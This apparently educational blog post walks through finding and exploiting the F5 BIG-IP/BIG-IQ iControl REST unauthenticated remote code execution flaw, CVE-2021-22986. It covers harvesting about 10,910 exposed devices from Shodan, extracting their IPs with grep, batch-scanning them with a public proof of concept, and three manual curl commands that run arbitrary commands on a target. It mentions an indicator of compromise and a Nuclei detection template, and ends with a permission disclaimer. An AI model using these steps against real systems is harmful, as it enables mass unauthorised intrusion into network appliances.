Finding and exploiting iControl REST unauthenticated RCE[ CVE-2021–22986 ]

3 min readOct 5, 2021


In march 10 , F5 released and advisory about the Unauthenticated rce on icontrol . On their report they described that any unauthenticated users can execute arbitrary system commands, create or delete files, or disable services.

Vulnerable/affected versions are:

  • F5 BIG-IQ 6.0.0–6.1.0
  • F5 BIG-IQ 7.0.0–
  • F5 BIG-IQ 7.1.0–
  • F5 BIG-IP 12.1.0–
  • F5 BIG-IP 13.1.0–
  • F5 BIG-IP 14.1.0–
  • F5 BIG-IP 15.1.0–15.1.2
  • F5 BIG-IP 16.0.0–16.0.1

There are no specific way to directly found the vulnerable device or network, we are gonna use simple Big-Ip detection method to to find systems potentially impacted by CVE-2021–22986.

Or We can use the IOC [Indicators of Compromise ] to detect potentially vulnerable devices. F5 Described on their article affected device will contain this text on /var/log/restjavad*.log.

"X-F5-Auth-Token doesn’t have value"

We can use Shodan to find potentially vulnerable devices . We can use the same filter we use to detect big ip devices on shodan.


shodan shows 10,910 devices , not all of them are vulnerable we are gonna detect and exploit the vulnerability using a simple proof of concept written by Al1ex. The Poc contains chinese word here is the translated version. We can either download all the result or use shodan cli to scan for this cve. First lets start with the downloaded shodan result.

We can download the result by using download result button.after downloading the result and the poc. Lets start detecting the vulnerability using this poc. by typing python3 -h we can see the help menu.

We can see on the help menu their is option described as batch detection

python3  -s true -f filename

first lets filter ip from the result we have downloaded from shodan,we can do that by using grep and regex on our linux shell.

cat shodan_file | grep -Po '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'

so lets save the output to a file , now its time to start the scan.

after detecting you can use to execute command on the target system without writing the full exploit command again and again.

You can exploit this vulnerability manually using these steps.

Step-1: curl -ksu admin: https://[target-ip]/mgmt/tm/access/bundle-install-tasks -d ‘{“filePath”:”[command-to-execute]”}’

Step-2: curl -ksu admin: https://[target-ip]/mgmt/tm/access/bundle-install-tasks -d ‘{“filePath”:”[command-to-execute]”}’

Step-3: curl -su admin: -H “Content-Type: application/json” http://[target-ip]:8100/mgmt/tm/util/bash -d ‘{“command”:”run”,”utilCmdArgs”:”-c [command-to-execute]”}’

Using automated exploit is much fast for detection and exploiting , manual exploition is slow , it will take more time to test a list.

You can use this to find P1 on your bugbounty program if any of their big ip product is vulnerable with the same vulnerability.

Nuclei Detection Script: CVE-2021–22986.yaml

[ Declaimer: the ip i have tested and exploited was my own local docker ip , please do not exploit or test others ip without permission.This article is Educational purposes only. ]




6th Dimension's Security Researchers